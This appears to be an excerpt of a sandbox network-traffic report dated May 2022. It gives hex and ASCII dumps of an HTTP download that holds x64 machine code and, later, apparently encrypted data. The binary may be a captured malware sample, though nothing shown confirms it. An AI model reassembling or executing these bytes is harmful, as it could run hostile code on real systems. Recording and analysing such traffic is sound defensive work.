                                                    2022-05-23 07:19:16 UTC49INData Raw: c8 48 8b c1 41 b9 03 00 00 00 4c 8d 05 47 73 01 00 48 8b d0 48 8b 8c 24 60 02 00 00 e8 4f 65 00 00 48 c7 44 24 28 00 00 00 00 c7 44 24 20 1a 01 00 00 4c 8d 0d b7 86 01 00 4c 8d 05 90 86 01 00 48 8d 15 d9 84 01 00 8b c8 e8 92 b1 ff ff 4c 8d 05 a3 75 01 00 ba 14 03 00 00 48 8d 0d 2f ff 01 00 e8 0a 5f 00 00 48 c7 44 24 28 00 00 00 00 c7 44 24 20 1d 01 00 00 4c 8d 0d 72 86 01 00 4c 8d 05 4b 86 01 00 48 8d 15 14 84 01 00 8b c8 e8 4d b1 ff ff 4c 8b 44 24 30 ba 14 03 00 00 48 8d 0d ec fe 01 00 e8 c7 5e 00 00 48 c7 44 24 28 00 00 00 00 c7 44 24 20 1e 01 00 00 4c 8d 0d 2f 86 01 00 4c 8d 05 08 86 01 00 48 8d 15 41 83 01 00 8b c8 e8 0a b1 ff ff 41 b8 10 20 01 00 48 8d 15 dd 82 01 00 48 8d 0d a6 fe 01 00 e8 81 43 00 00 48 8b 8c 24 80 02 00 00 48 33 cc e8 71 63 ff ff
                                                    Data Ascii: HALGsHH$`OeHD$(D$ LLHLuH/_HD$(D$ LrLKHMLD$0H^HD$(D$ L/LHAA HHCH$H3qc
                                                    2022-05-23 07:19:16 UTC51INData Raw: c4 78 c3 4a d0 00 00 ea d0 00 00 9a d0 00 00 c2 d0 00 00 72 d0 00 00 3e d1 00 00 00 05 01 05 02 05 01 05 05 01 05 05 05 03 05 05 05 05 05 04 02 cc cc cc cc cc cc cc 48 89 54 24 10 89 4c 24 08 48 83 ec 18 48 8b 44 24 28 48 89 04 24 48 8b 04 24 8b 4c 24 20 39 48 04 74 2a 48 8b 04 24 48 83 c0 10 48 89 04 24 48 63 05 d6 62 01 00 48 6b c0 10 48 8b 4c 24 28 48 03 c8 48 8b c1 48 39 04 24 73 02 eb c9 48 63 05 b8 62 01 00 48 6b c0 10 48 8b 4c 24 28 48 03 c8 48 8b c1 48 39 04 24 73 15 48 8b 04 24 8b 4c 24 20 39 48 04 75 08 48 8b 04 24 eb 04 eb 02 33 c0 48 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 48 8b 0d a5 ff 01 00 ff 15 af 4c 01 00 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 8b 44 24 08 48 89 05 97 ff 01 00 c3 cc cc cc cc cc cc
                                                    Data Ascii: xJr>HT$L$HHD$(H$H$L$ 9Ht*H$HH$HcbHkHL$(HHH9$sHcbHkHL$(HHH9$sH$L$ 9HuH$3HH(HLH(HL$HD$H
                                                    2022-05-23 07:19:16 UTC52INData Raw: 24 70 48 8b 44 24 38 48 8b 8c 24 98 00 00 00 48 2b c8 48 8b c1 48 8b 8c 24 90 00 00 00 48 8d 44 01 01 4c 8b 44 24 70 ba fe 00 00 00 48 8b c8 e8 ba 59 ff ff 33 c0 48 81 c4 88 00 00 00 c3 cc cc cc cc cc cc 66 66 0f 1f 84 00 00 00 00 00 48 8b c1 48 f7 d9 48 a9 07 00 00 00 74 0f 66 90 8a 10 48 ff c0 84 d2 74 5f a8 07 75 f3 49 b8 ff fe fe fe fe fe fe 7e 49 bb 00 01 01 01 01 01 01 81 48 8b 10 4d 8b c8 48 83 c0 08 4c 03 ca 48 f7 d2 49 33 d1 49 23 d3 74 e8 48 8b 50 f8 84 d2 74 51 84 f6 74 47 48 c1 ea 10 84 d2 74 39 84 f6 74 2f 48 c1 ea 10 84 d2 74 21 84 f6 74 17 c1 ea 10 84 d2 74 0a 84 f6 75 b9 48 8d 44 01 ff c3 48 8d 44 01 fe c3 48 8d 44 01 fd c3 48 8d 44 01 fc c3 48 8d 44 01 fb c3 48 8d 44 01 fa c3 48 8d 44 01 f9 c3 48 8d 44 01 f8 c3 cc cc cc cc cc cc cc cc 89
                                                    Data Ascii: $pHD$8H$H+HH$HDLD$pHY3HffHHHtfHt_uI~IHMHLHI3I#tHPtQtGHt9t/Ht!ttuHDHDHDHDHDHDHDHD
                                                    2022-05-23 07:19:16 UTC53INData Raw: 8b 44 24 30 48 8b 88 40 01 00 00 e8 05 75 ff ff ba 02 00 00 00 48 8b 44 24 30 48 8b 88 48 01 00 00 e8 ef 74 ff ff ba 02 00 00 00 48 8b 44 24 30 48 8b 88 50 01 00 00 e8 d9 74 ff ff ba 02 00 00 00 48 8b 44 24 30 48 8b 88 70 01 00 00 e8 c3 74 ff ff ba 02 00 00 00 48 8b 44 24 30 48 8b 88 78 01 00 00 e8 ad 74 ff ff ba 02 00 00 00 48 8b 44 24 30 48 8b 88 80 01 00 00 e8 97 74 ff ff ba 02 00 00 00 48 8b 44 24 30 48 8b 88 88 01 00 00 e8 81 74 ff ff ba 02 00 00 00 48 8b 44 24 30 48 8b 88 90 01 00 00 e8 6b 74 ff ff ba 02 00 00 00 48 8b 44 24 30 48 8b 88 98 01 00 00 e8 55 74 ff ff ba 02 00 00 00 48 8b 44 24 30 48 8b 88 68 01 00 00 e8 3f 74 ff ff ba 02 00 00 00 48 8b 44 24 30 48 8b 88 a8 01 00 00 e8 29 74 ff ff ba 02 00 00 00 48 8b 44 24 30 48 8b 88 b0 01 00 00 e8 13
                                                    Data Ascii: D$0H@uHD$0HHtHD$0HPtHD$0HptHD$0HxtHD$0HtHD$0HtHD$0HktHD$0HUtHD$0Hh?tHD$0H)tHD$0H
                                                    2022-05-23 07:19:16 UTC55INData Raw: 34 62 35 38 0d 0a 48 18 74 13 ba 02 00 00 00 48 8b 44 24 30 48 8b 48 18 e8 05 70 ff ff 48 8b 44 24 30 48 8b 0d 39 db 01 00 48 39 48 20 74 13 ba 02 00 00 00 48 8b 44 24 30 48 8b 48 20 e8 e0 6f ff ff 48 8b 44 24 30 48 8b 0d 1c db 01 00 48 39 48 28 74 13 ba 02 00 00 00 48 8b 44 24 30 48 8b 48 28 e8 bb 6f ff ff 48 8b 44 24 30 48 8b 0d ff da 01 00 48 39 48 30 74 13 ba 02 00 00 00 48 8b 44 24 30 48 8b 48 30 e8 96 6f ff ff 48 8b 44 24 30 48 8b 0d e2 da 01 00 48 39 48 38 74 13 ba 02 00 00 00 48 8b 44 24 30 48 8b 48 38 e8 71 6f ff ff 48 8b 44 24 30 48 8b 0d c5 da 01 00 48 39 48 40 74 13 ba 02 00 00 00 48 8b 44 24 30 48 8b 48 40 e8 4c 6f ff ff 48 8b 44 24 30 48 8b 0d a8 da 01 00 48 39 48 48 74 13 ba 02 00 00 00 48 8b 44 24 30 48 8b 48 48 e8 27 6f ff ff 48 8b 44 24
                                                    Data Ascii: 4b58HtHD$0HHpHD$0H9H9H tHD$0HH oHD$0HH9H(tHD$0HH(oHD$0HH9H0tHD$0HH0oHD$0HH9H8tHD$0HH8qoHD$0HH9H@tHD$0HH@LoHD$0HH9HHtHD$0HHH'oHD$
                                                    2022-05-23 07:19:16 UTC59INData Raw: 24 40 e8 46 00 00 00 48 8b 4c 24 50 e8 3c 00 00 00 8b 44 24 48 48 81 c4 98 00 00 00 c3 89 54 24 10 48 89 4c 24 08 48 83 7c 24 08 00 74 19 48 8b 44 24 08 8b 4c 24 10 89 08 48 8b 44 24 08 48 83 c0 10 48 89 44 24 08 48 8b 44 24 08 c3 48 89 4c 24 08 48 83 ec 48 48 83 7c 24 50 00 74 6d 48 8b 44 24 50 48 83 e8 10 48 89 44 24 50 48 8b 44 24 50 8b 00 89 44 24 30 81 7c 24 30 dd dd 00 00 75 0c 48 8b 4c 24 50 e8 a2 69 00 00 eb 3e 81 7c 24 30 cc cc 00 00 74 34 33 c0 85 c0 75 2e 48 8d 05 09 6d 01 00 48 89 44 24 20 45 33 c9 41 b8 f8 00 00 00 48 8d 15 84 6c 01 00 b9 02 00 00 00 e8 5a bf ff ff 83 f8 01 75 03 cc 33 c0 48 83 c4 48 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 89 54 24 10 48 89 4c 24 08 48 83 ec 18 8b 44 24 28 89 44 24 08 48 8b 44 24 20 48 89 04 24 8b 44 24 08
                                                    Data Ascii: $@FHL$P<D$HHT$HL$H|$tHD$L$HD$HHD$HD$HL$HHH|$PtmHD$PHHD$PHD$PD$0|$0uHL$Pi>|$0t43u.HmHD$ E3AHlZu3HHT$HL$HD$(D$HD$ H$D$
                                                    2022-05-23 07:19:16 UTC63INData Raw: 83 bc 24 30 81 00 00 00 74 11 48 8d 05 df 67 01 00 48 89 84 24 c8 80 00 00 eb 0f 48 8d 05 a6 67 01 00 48 89 84 24 c8 80 00 00 4c 8b 84 24 c8 80 00 00 ba 00 10 00 00 48 8d 8c 24 70 30 00 00 e8 e4 11 00 00 48 c7 44 24 28 00 00 00 00 c7 44 24 20 0b 02 00 00 4c 8d 0d 2c 5d 01 00 4c 8d 05 25 69 01 00 48 8d 15 ae 66 01 00 8b c8 e8 67 7b ff ff 4c 8d 84 24 70 50 00 00 ba 00 10 00 00 48 8d 8c 24 70 30 00 00 e8 dd 28 00 00 48 c7 44 24 28 00 00 00 00 c7 44 24 20 0d 02 00 00 4c 8d 0d e5 5c 01 00 4c 8d 05 de 68 01 00 48 8d 15 07 66 01 00 8b c8 e8 20 7b ff ff 83 bc 24 10 81 00 00 02 0f 85 a5 00 00 00 48 63 84 24 10 81 00 00 48 8d 0d 13 ba 01 00 8b 04 81 83 e0 01 85 c0 74 46 4c 8d 05 ce 65 01 00 ba 00 10 00 00 48 8d 8c 24 70 30 00 00 e8 70 28 00 00 48 c7 44 24 28 00 00
                                                    Data Ascii: $0tHgH$HgH$L$H$p0HD$(D$ L,]L%iHfg{L$pPH$p0(HD$(D$ L\LhHf {$Hc$HtFLeH$p0p(HD$(
                                                    2022-05-23 07:19:16 UTC67INData Raw: 00 00 48 8b 44 24 30 48 39 05 95 bf 01 00 74 2c 48 8b 0d 8c bf 01 00 ff 15 36 0c 01 00 48 89 84 24 88 00 00 00 48 83 bc 24 88 00 00 00 00 74 0c ff 94 24 88 00 00 00 48 89 44 24 58 48 83 7c 24 58 00 74 3f 48 8b 44 24 30 48 39 05 5b bf 01 00 74 31 48 8b 0d 52 bf 01 00 ff 15 f4 0b 01 00 48 89 84 24 90 00 00 00 48 83 bc 24 90 00 00 00 00 74 11 48 8b 4c 24 58 ff 94 24 90 00 00 00 48 89 44 24 58 48 8b 0d 11 bf 01 00 ff 15 c3 0b 01 00 48 89 84 24 98 00 00 00 48 83 bc 24 98 00 00 00 00 74 28 44 8b 8c 24 d0 00 00 00 4c 8b 84 24 c8 00 00 00 48 8b 94 24 c0 00 00 00 48 8b 4c 24 58 ff 94 24 98 00 00 00 eb 04 eb 02 33 c0 48 8b 8c 24 a0 00 00 00 48 33 cc e8 06 1d ff ff 48 81 c4 b8 00 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 4c 89 4c 24 20 4c 89 44 24 18 48 89
                                                    Data Ascii: HD$0H9t,H6H$H$t$HD$XH|$Xt?HD$0H9[t1HRH$H$tHL$X$HD$XHH$H$t(D$L$H$HL$X$3H$H3HLL$ LD$H
                                                    2022-05-23 07:19:16 UTC71INData Raw: 24 78 ff 0f 84 81 00 00 00 48 81 7c 24 78 ff ff ff 7f 74 76 8b 44 24 30 ff c0 48 98 48 3b 44 24 78 73 67 8b 44 24 30 ff c0 48 98 48 8b 4c 24 78 48 2b c8 48 8b c1 48 39 05 e1 8a 01 00 73 0e 48 8b 05 d8 8a 01 00 48 89 44 24 58 eb 18 8b 44 24 30 ff c0 48 98 48 8b 4c 24 78 48 2b c8 48 8b c1 48 89 44 24 58 8b 44 24 30 ff c0 48 98 48 8b 4c 24 70 48 03 c8 48 8b c1 4c 8b 44 24 58 ba fe 00 00 00 48 8b c8 e8 04 0d ff ff 8b 44 24 30 48 83 c4 68 c3 cc cc cc cc cc cc cc cc cc cc cc 4c 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 81 ec 88 00 00 00 c7 44 24 30 ff ff ff ff c7 44 24 34 00 00 00 00 48 83 bc 24 a8 00 00 00 00 74 0a c7 44 24 44 01 00 00 00 eb 08 c7 44 24 44 00 00 00 00 8b 44 24 44 89 44 24 38 83 7c 24 38 00 75 2e 48 8d 05 1a 4f 01 00 48 89 44
                                                    Data Ascii: $xH|$xtvD$0HH;D$xsgD$0HHL$xH+HH9sHHD$XD$0HHL$xH+HHD$XD$0HHL$pHHLD$XHD$0HhLL$ LD$HT$HL$HD$0D$4H$tD$DD$DD$DD$8|$8u.HOHD
                                                    2022-05-23 07:19:16 UTC74INData Raw: 32 31 35 62 0d 0a 00 00 00 ff ff ff 7f 74 5e 48 83 bc 24 a8 00 00 00 01 76 53 48 8b 84 24 a8 00 00 00 48 ff c8 48 39 05 ae 81 01 00 73 0e 48 8b 05 a5 81 01 00 48 89 44 24 58 eb 10 48 8b 84 24 a8 00 00 00 48 ff c8 48 89 44 24 58 48 8b 44 24 58 48 d1 e0 48 8b 8c 24 a0 00 00 00 48 83 c1 02 4c 8b c0 ba fe 00 00 00 e8 dd 03 ff ff 48 83 bc 24 b0 00 00 00 00 74 0a c7 44 24 60 01 00 00 00 eb 08 c7 44 24 60 00 00 00 00 8b 44 24 60 89 44 24 44 83 7c 24 44 00 75 2e 48 8d 05 d2 27 01 00 48 89 44 24 20 45 33 c9 41 b8 13 00 00 00 48 8d 15 75 48 01 00 b9 02 00 00 00 e8 8b 84 ff ff 83 f8 01 75 03 cc 33 c0 83 7c 24 44 00 75 3e e8 f7 7b ff ff c7 00 16 00 00 00 48 c7 44 24 20 00 00 00 00 41 b9 13 00 00 00 4c 8d 05 3b 48 01 00 48 8d 15 14 48 01 00 48 8d 0d 75 27 01 00 e8 08
                                                    Data Ascii: 215bt^H$vSH$HH9sHHD$XH$HHD$XHD$XHH$HLH$tD$`D$`D$`D$D|$Du.H'HD$ E3AHuHu3|$Du>{HD$ AL;HHHHu'
                                                    2022-05-23 07:19:16 UTC78INData Raw: 01 00 00 e9 a4 01 00 00 48 8b 84 24 a0 00 00 00 83 78 0c 00 75 58 48 8b 84 24 a0 00 00 00 8b 00 25 ff ff ff 1f 3d 21 05 93 19 0f 82 7c 01 00 00 48 8b 84 24 a0 00 00 00 83 78 20 00 74 1b e8 52 a7 ff ff 48 8b 8c 24 a0 00 00 00 48 63 49 20 48 03 c1 48 89 44 24 60 eb 09 48 c7 44 24 60 00 00 00 00 48 83 7c 24 60 00 0f 84 3e 01 00 00 48 8b 84 24 80 00 00 00 81 38 63 73 6d e0 0f 85 d4 00 00 00 48 8b 84 24 80 00 00 00 83 78 18 03 0f 82 c2 00 00 00 48 8b 84 24 80 00 00 00 81 78 20 22 05 93 19 0f 86 ad 00 00 00 48 8b 84 24 80 00 00 00 48 8b 40 30 83 78 08 00 74 1f e8 f5 a6 ff ff 48 8b 8c 24 80 00 00 00 48 8b 49 30 48 63 49 08 48 03 c1 48 89 44 24 68 eb 09 48 c7 44 24 68 00 00 00 00 48 8b 44 24 68 48 89 44 24 50 48 83 7c 24 50 00 74 61 0f b6 84 24 b8 00 00 00 89 44
                                                    Data Ascii: H$xuXH$%=!|H$x tRH$HcI HHD$`HD$`H|$`>H$8csmH$xH$x "H$H@0xtH$HI0HcIHHD$hHD$hHD$hHD$PH|$Pta$D
                                                    2022-05-23 07:19:16 UTC82INData Raw: 44 24 40 48 8b 44 24 40 8b 00 ff c0 48 8b 4c 24 40 89 01 83 7c 24 20 ff 0f 84 75 01 00 00 8b 84 24 98 00 00 00 39 44 24 20 0f 8e 64 01 00 00 83 7c 24 20 ff 7e 13 48 8b 84 24 90 00 00 00 8b 40 04 39 44 24 20 7d 02 eb 05 e8 c2 7f ff ff e8 bd 96 ff ff 48 8b 8c 24 0d 0a
                                                    Data Ascii: D$@HD$@HL$@|$ u$9D$ d|$ ~H$@9D$ }H$
                                                    2022-05-23 07:19:16 UTC82INData Raw: 34 35 64 36 0d 0a 90 00 00 00 48 63 49 08 48 03 c1 48 63 4c 24 20 8b 04 c8 89 44 24 30 e8 9d 96 ff ff 48 8b 8c 24 90 00 00 00 48 63 49 08 48 03 c1 48 63 4c 24 20 83 7c c8 04 00 74 3a e8 7d 96 ff ff 48 89 44 24 48 e8 73 96 ff ff 48 8b 8c 24 90 00 00 00 48 63 49 08 48 03 c1 48 63 4c 24 20 48 63 44 c8 04 48 8b 4c 24 48 48 03 c8 48 8b c1 48 89 44 24 50 eb 09 48 c7 44 24 50 00 00 00 00 48 83 7c 24 50 00 0f 84 a7 00 00 00 44 8b 4c 24 30 4c 8b 84 24 90 00 00 00 48 8b 94 24 88 00 00 00 48 8b 8c 24 80 00 00 00 e8 61 eb ff ff e8 0c 96 ff ff 48 8b 8c 24 90 00 00 00 48 63 49 08 48 03 c1 48 63 4c 24 20 83 7c c8 04 00 74 3a e8 ec 95 ff ff 48 89 44 24 58 e8 e2 95 ff ff 48 8b 8c 24 90 00 00 00 48 63 49 08 48 03 c1 48 63 4c 24 20 48 63 44 c8 04 48 8b 4c 24 58 48 03 c8 48
                                                    Data Ascii: 45d6HcIHHcL$ D$0H$HcIHHcL$ |t:}HD$HsH$HcIHHcL$ HcDHL$HHHHD$PHD$PH|$PDL$0L$H$H$aH$HcIHHcL$ |t:HD$XH$HcIHHcL$ HcDHL$XHH
                                                    2022-05-23 07:19:16 UTC86INData Raw: 44 24 70 e9 7b 03 00 00 48 8b 44 24 30 48 ff c0 48 89 44 24 30 48 8b 84 24 e0 00 00 00 48 83 c0 02 48 89 84 24 e0 00 00 00 e9 72 ff ff ff 48 8b 44 24 30 48 89 44 24 78 48 8d 4c 24 38 e8 78 07 ff ff 48 8b 44 24 78 e9 37 03 00 00 e9 45 02 00 00 48 8d 4c 24 38 e8 9f 07 ff ff 48 8b 00 8b 8c 24 f0 00 00 00 89 4c 24 28 48 8b 8c 24 e0 00 00 00 48 89 4c 24 20 41 b9 ff ff ff ff 4c 8b 84 24 e8 00 00 00 ba 09 00 00 00 8b 48 04 ff 15 30 c1 00 00 48 98 48 89 44 24 30 48 83 7c 24 30 00 74 27 48 8b 44 24 30 48 ff c8 48 89 84 24 80 00 00 00 48 8d 4c 24 38 e8 ff 06 ff ff 48 8b 84 24 80 00 00 00 e9 bb 02 00 00 ff 15 bc bf 00 00 83 f8 7a 74 3b e8 12 4a ff ff c7 00 2a 00 00 00 33 c0 48 8b 8c 24 e0 00 00 00 66 89 01 48 c7 84 24 88 00 00 00 ff ff ff ff 48 8d 4c 24 38 e8 b9 06
                                                    Data Ascii: D$p{HD$0HHD$0H$HH$rHD$0HD$xHL$8xHD$x7EHL$8H$L$(H$HL$ AL$H0HHD$0H|$0t'HD$0HH$HL$8H$zt;J*3H$fH$HL$8
                                                    2022-05-23 07:19:16 UTC90INData Raw: 00 48 8d 15 b5 0a 01 00 48 8d 0d 2e 0b 01 00 e8 91 4c ff ff b8 16 00 00 00 e9 aa 04 00 00 48 83 bc 24 b0 00 00 00 00 76 0a c7 44 24 68 01 00 00 00 eb 08 c7 44 24 68 00 00 00 00 8b 44 24 68 89 44 24 54 83 7c 24 54 00 75 2e 48 8d 05 44 0a 01 00 48 89 44 24 20 45 33 c9 41 b8 67 00 00 00 48 8d 15 6f 0a 01 00 b9 02 00 00 00 e8 75 42 ff ff 83 f8 01 75 03 cc 33 c0 83 7c 24 54 00 75 3e e8 e1 39 ff ff c7 00 16 00 00 00 48 c7 44 24 20 00 00 00 00 41 b9 67 00 00 00 4c 8d 05 35 0a 01 00 48 8d 15 16 0a 01 00 48 8d 0d e7 09 01 00 e8 f2 4b ff ff b8 16 00 00 00 e9 0b 04 00 00 48 8b 84 24 a8 00 00 00 c6 00 00 48 83 bc 24 b0 00 00 00 ff 74 68 48 81 bc 24 b0 00 00 00 ff ff ff 7f 74 5a 48 83 bc 24 b0 00 00 00 01 76 4f 48 8b 84 24 b0 00 00 00 48 ff c8 48 39 05 77 3e 01 00 73
                                                    Data Ascii: HH.LH$vD$hD$hD$hD$T|$Tu.HDHD$ E3AgHouBu3|$Tu>9HD$ AgL5HHKH$H$thH$tZH$vOH$HH9w>s
                                                    2022-05-23 07:19:16 UTC94INData Raw: 24 40 48 83 bc 24 a8 00 00 00 00 0f 84 75 01 00 00 48 8b 84 24 b0 00 00 00 48 39 44 24 40 0f 86 4b 01 00 00 48 83 bc 24 c0 00 00 00 ff 0f 84 27 01 00 00 48 8b 84 24 a8 00 00 00 c6 00 00 48 83 bc 24 b0 00 00 00 ff 74 68 48 81 bc 24 b0 00 00 00 ff ff ff 7f 74 5a 48 83 bc 24 b0 00 00 00 01 76 4f 48 8b 84 24 b0 00 00 00 48 ff c8 48 39 05 7c 2e 01 00 73 0e 48 8b 05 73 2e 01 00 48 89 44 24 78 eb 10 48 8b 84 24 b0 00 00 00 48 ff c8 48 89 44 24 78 48 8b 84 24 a8 00 00 00 48 ff c0 4c 8b 44 24 78 ba fe 00 00 00 48 8b c8 e8 af b0 fe ff 48 8b 44 24 40 48 39 84 24 b0 00 00 00 76 0d c7 84 24 80 00 00 00 01 00 00 00 eb 0b c7 84 24 80 00 00 00 00 00 00 00 8b 84 24 80 00 00 00 89 44 24 50 83 7c 24 50 00 75 2e 48 8d 05 9f fa 00 00 48 89 44 24 20 45 33 c9 41 b8 64 01 00 00
                                                    Data Ascii: $@H$uH$H9D$@KH$'H$H$thH$tZH$vOH$HH9|.sHs.HD$xH$HHD$xH$HLD$xHHD$@H9$v$$$D$P|$Pu.HHD$ E3Ad
                                                    2022-05-23 07:19:16 UTC98INData Raw: 3b e8 55 19 ff ff c7 00 22 00 00 00 48 c7 44 24 20 00 00 00 00 41 b9 8e 00 00 00 4c 8d 05 a9 e9 00 00 48 8d 15 ca ec 00 00 48 8d 0d a3 e8 00 00 e8 66 2b ff ff b8 22 00 00 00 eb 6c 33 c0 48 8b 4c 24 30 66 89 01 48 8b 44 24 30 48 83 e8 02 48 89 44 24 30 48 8b 44 24 30 0f b7 00 66 89 44 24 44 48 8b 44 24 30 48 8b 4c 24 48 0f b7 09 66 89 08 48 8b 44 24 48 0f b7 4c 24 44 66 89 08 48 8b 44 24 30 48 83 e8 02 48 89 44 24 30 48 8b 44 24 48 48 83 c0 02 48 89 44 24 48 48 8b 44 24 30 48 39 44 24 48 72 ae 33 c0 48 81 c4 98 00 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc 44 89 44 24 18 48 89 54 24 10 89 4c 24 08 48 83 ec 58 48 c7 44 24 30 ff ff ff ff 48 63 44 24 60 48 83 f8 fe 75 22 e8 a5 18 ff ff c7 00 00 00 00 00 e8 6a 18 ff ff c7 00 09 00 00 00 48 c7 c0 ff ff ff ff e9
                                                    Data Ascii: ;U"HD$ ALHHf+"l3HL$0fHD$0HHD$0HD$0fD$DHD$0HL$HfHD$HL$DfHD$0HHD$0HD$HHHD$HHD$0H9D$Hr3HDD$HT$L$HXHD$0HcD$`Hu"jH
                                                    Data Ascii: !Rl|[cDj\a@j+hH:Qd4bfxjRG;\,ddk#)j+hbce@*o*:gZQ#*BrgXEr0jz5v_2ksfe!mO1kP=M1$qYP+xI*fTqU!r///+AWvF`' PqY'sk^H]v<^yi`P+fZ\nB5qLQE#\4A_H
                                                    2022-05-23 07:19:16 UTC291INData Raw: 33 61 39 0d 0a a2 39 65 e0 d7 34 54 39 6b 22 e9 b5 5e 30 6b 6a 7c 38 32 4d ba f3 76 41 24 5f 3d e2 17 58 67 e4 2d e3 dd 32 67 5a 51 e5 71 52 63 dd 68 46 66 58 ce 35 6f 30 69 93 fb 52 31 73 5f 8c cd c1 c3 9a dc 18 35 64 21 93 d4 a1 c6 94 ec 2c 24 2e 1d 09 2c 5e f0 23 c8 da 27 2a cd 71 ef f8 2d 7c 30 3e 78 2a 68 89 46 42 3a 52 ed 41 52 23 0d be 62 66 9f 01 56 0f ad 0a 77 43 a3 58 52 37 6b b4 41 18 0d 3d ac e2 7d 20 7a 24 16 f4 ce 2b a9 a5 56 30 6b 6a 59 c9 b9 55 30 76 66 aa 16 5f 79 e8 dd 48 2a 6f 2a 6d 85 d5 99 db e4 74 34 76 43 f6 ef 8e 34 9f 01 56 03 52 a9 f0 43 e9 78 52 3b 92 d6 f4 d6 60 ed 3f 43 01 a0 0e 00 31 6a 00 24 68 c7 cb 21 6a 6a 5e 7c 98 22 31 f7 e3 50 25 5f 79 f7 90 af d4 ee af 78 49 2a 66 80 fa 6c 35 fd c6 25 70 6a 66 d5 49 f2 a6 99 69 ea ce
                                                    Data Ascii: 3a99e4T9k"^0kj|82MvA$_=Xg-2gZQqRchFfX5o0iR1s_5d!,$.,^#'*q-|0>x*hFB:RAR#bfVwCXR7kA=} z$+V0kjYU0vf_yH*o*mt4vC4VRCxR;`?C1j$h!jj^|"1P%_yxI*fl5%pjfIi
                                                    2022-05-23 07:19:16 UTC292INData Raw: 33 37 65 64 0d 0a bc 5f 50 5f 0d c3 ef b9 d5 99 9d d4 74 34 76 43 cd 19 3f 66 15 ce b5 0c fd 72 62 43 62 1d ff da 7d 36 35 3c e4 d1 73 66 65 21 8f 12 fa 34 ac ae 78 01 4e 31 b5 81 70 48 fd e0 21 77 66 40 22 de cc 79 59 50 2b 42 63 0d 72 ab d3 4a 50 6c 35 c9 56 5c 4b e1 f3 48 44 72 67 f3 e7 7b 42 62 34 9e 7b 07 37 35 79 56 9b 22 ec a2 69 fb e0 ed 38 6b 2b 29 5f 0f 6f 2a 37 1f 14 63 13 6a 2b a5 8c e8 17 fa 85 40 97 6f 4b 22 58 fe 2a 66 69 91 20 be b7 ca 71 55 66 a1 1c 61 52 72 11 fb 63 c2 16 10 56 68 29 55 3e fd 09 40 4b 64 e4 55 5e 04 5d 64 19 2a e3 44 6a 11 e2 2e 7a 68 fb 09 15 46 37 59 4e 2e be 6d 7c 91 e8 25 4a af 0c 0e 4e 0a a2 04 ac b1 07 11 49 aa a5 82 3a b5 23 5c 4a e6 4d 35 34 b7 3b 41 17 3a bd 29 40 4b 2f 11 38 51 a5 21 1d 4b cf a5 57 e1 ba 2f 4e
                                                    Data Ascii: 37ed_P_t4vC?frbCb}65<sfe!4xN1pH!wf@"yYP+BcrJPl5V\KHDrg{Bb4{75yV"i8k+)_o*7cj+@oK"X*fi qUfaRrcVh)U>@KdU^]d*Dj.zhF7YN.m|%JNI:#\JM54;A:)@K/8Q!KW/N
                                                    2022-05-23 07:19:16 UTC306INData Raw: 31 39 33 62 0d 0a f8 2e 42 78 ce 3e 43 40 e1 67 67 51 fc 37 d6 6f f0 71 18 45 46 42 11 65 a0 3e 00 75 d0 f6 d4 97 81 3a 15 4b 8d f5 3a 3c c6 75 52 46 c9 60 7b 59 21 db 94 33 ac e6 a4 08 79 2e d9 bd 2c 7c fd 9b dd 73 82 99 a7 76 b2 2f f1 2e 47 6f eb 70 52 6b 2d bc 30 14 d9 64 6b a0 21 05 52 13 82 30 6b 63 ed c0 3b 6c ac 2e 7a 68 25 b0 78 76 df 54 e1 ce 39 28 e0 a0 34 10 7f 03 0c 0e 46 28 d8 28 11 56 c2 41 55 4a cc 58 b7 52 a0 3c 4e 0b 86 e2 7f 76 9e 09 13 5d 3b e4 10 4f 0f 9d 96 0d 69 d4 4d 4f 43 cc 9f a5 29 ea 1e 7a 20 e5 45 a2 23 ed 04 00 37 f2 2d 7c 70 c3 3e 78 68 48 62 ef 5f ef d7 35 76 0b be ba 22 e5 9c 05 29 2f 87 8a af 8f ae bd 22 7b 75 be 79 18 6d 31 38 31 32 60 2c 6c d8 95 4f 0b 94 ff b1 79 ea 86 ae 4c 3c 4d 79 fd d3 60 20 5f 79 5a 98 97 6e df d7
                                                    Data Ascii: 193b.Bx>C@ggQ7oqEFBe>u:K:<uRF`{Y!3y.,|sv/.GopRk-0dk!R0kc;l.zh%xvT9(4F((VAUJXR<Nv];OiMOC)z E#7-|p>xhHb_5v")/"{uym1812`,lOyL<My` _yZn
                                                    2022-05-23 07:19:16 UTC312INData Raw: 63 32 66 0d 0a 69 32 ad 11 1d 2b a0 ed a8 4d 31 6b e3 1a 6c 04 c6 b4 ce 65 40 24 17 f2 a2 d1 14 0f 5f a1 ed e8 29 66 5a 15 e7 71 52 13 be e4 da 65 58 45 fb 23 5c 42 8b 06 97 cb 89 98 e0 9f 36 3c 65 cd 54 ae 65 4a ff 8c 56 39 6b 43 e1 85 e6 32 6b 6a 9f e5 94 4e 31 76 76 c1 a9 f7 7a 69 58 0d cb 59 cb e9 fd 82 65 5a 51 1b c8 40 a2 f2 f4 ca 65 58 45 63 50 1e 6a 08 c6 c2 37 76 5f 4a be b0 9c 66 64 6b e6 e0 81 79 24 55 fc e2 d4 97 81 fb 91 68 6a 5e 43 2d 8d 23 fd f3 e0 27 5f 79 e2 d5 f8 28 6f 2a 24 c3 e9 8e 6e 35 6c 35 cd ee 0b 74 6a e7 a3 f6 0c 6e 78 65 e7 c9 99 cb 89 b6 c3 cd ca c3 a9 a8 23 e4 89 39 bd 60 71 19 e9 cc 62 00 89 75 4f 4a 26 da f5 4d 7d fd af 81 48 7b 59 63 d3 14 0f 4f 6e e5 4c 6a 27 9b b1 6f 71 ff 07 11 51 ab 02 7c 65 70 e6 0c 4e 43 de b1 28 76
                                                    Data Ascii: c2fi2+M1kle@$_)fZqReXE#\B6<eTeJV9kC2kjN1vvziXYeZQ@eXEcPj7v_Jfdky$Uhj^C-#'_y(o*$n5l5tjnxe#9`qbuOJ&M}H{YcOnLj'oqQ|epNC(v
